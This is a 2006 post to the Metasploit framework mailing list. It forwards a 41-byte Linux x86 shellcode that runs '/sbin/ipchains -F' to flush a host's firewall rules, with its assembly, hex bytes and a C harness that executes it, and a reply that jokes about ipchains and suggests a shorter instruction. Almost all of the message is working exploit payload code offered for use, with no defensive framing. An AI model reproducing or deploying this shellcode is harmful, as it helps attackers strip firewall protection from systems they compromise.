[framework] [Fwd: [Code-Crunchers] 41 byte shellcode to flush ipchains for Linux x86]
mmiller at hick.org
mmiller at hick.org
Fri Nov 17 14:47:35 CST 2006
People still use ipchains? :)
> * push byte 11
> * pop eax
> * xor edx, edx
cdq man, cdq!
On Fri, Nov 17, 2006 at 06:41:04PM +0100, Jerome Athias wrote:
> /* By Kris Katterjohn 11/15/2006
> *
> * 41 byte shellcode to flush ipchains for Linux x86
> *
> *
> *
> * section .text
> *
> * global _start
> *
> * _start:
> *
> * ; execve("/sbin/ipchains", { "/sbin/ipchains", "-F", NULL }, NULL)
> *
> * push byte 11
> * pop eax
> * xor edx, edx
> * push edx
> * push word 0x462d
> * mov ecx, esp
> * push edx
> * push word 0x736e
> * push 0x69616863
> * push 0x70692f6e
> * push 0x6962732f
> * mov ebx, esp
> * push edx
> * push ecx
> * push ebx
> * mov ecx, esp
> * int 0x80
> */
>
> main()
> {
> char shellcode[] =
> "\x6a\x0b\x58\x31\xd2\x52\x66\x68\x2d\x46"
> "\x89\xe1\x52\x66\x68\x6e\x73\x68\x63\x68"
> "\x61\x69\x68\x6e\x2f\x69\x70\x68\x2f\x73"
> "\x62\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
>
> (*(void (*)()) shellcode)();
> }
>
>
>
> _______________________________________________
> Code-Crunchers mailing list
> Code-Crunchers at whitestar.linuxbox.org
> http://whitestar.linuxbox.org/mailman/listinfo/code-crunchers
>
>
More information about the framework
mailing list